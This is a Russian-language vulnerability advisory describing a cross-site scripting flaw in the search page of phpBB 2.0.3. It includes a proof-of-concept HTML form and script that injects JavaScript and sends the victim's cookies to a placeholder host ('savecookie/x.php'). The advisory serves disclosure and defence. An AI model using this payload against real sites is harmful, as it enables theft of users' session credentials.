Межсайтовый скриптинг в phpBB

Дата публикации:
09.12.2002
Дата изменения:
17.10.2006
Всего просмотров:
1185
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: phpBB – популярная доска объявлений для UNIX и Windows систем. Из-за недостаточной фильтрации ввода пользователя, удаленный атакующий может внедрить произвольный код сценария в сгенерированную страницу поиска. Уязвимость может использоваться для кражи опознавательных мандатов, хранящихся в куки. Пример:
html> 
<body> 
<form method="post" name="search" 
action="http://target/search.php?mode=searchuser"> 
<input type="hidden" name="search_username" value=""/> 

</form> 
<SCRIPT> 
search.search_username.value='Http://savecookie/x.php?Cookie="><script>location=search.search_username.value+document.cookie;</script\>'; 
document.search.submit(); 
</script> 
</body> 
</html>
уязвимость обнаружена в phpBB 2.0.3

Ссылки: Cross-site Scripting Vulnerability in phpBB 2.0.3
или введите имя

CAPTCHA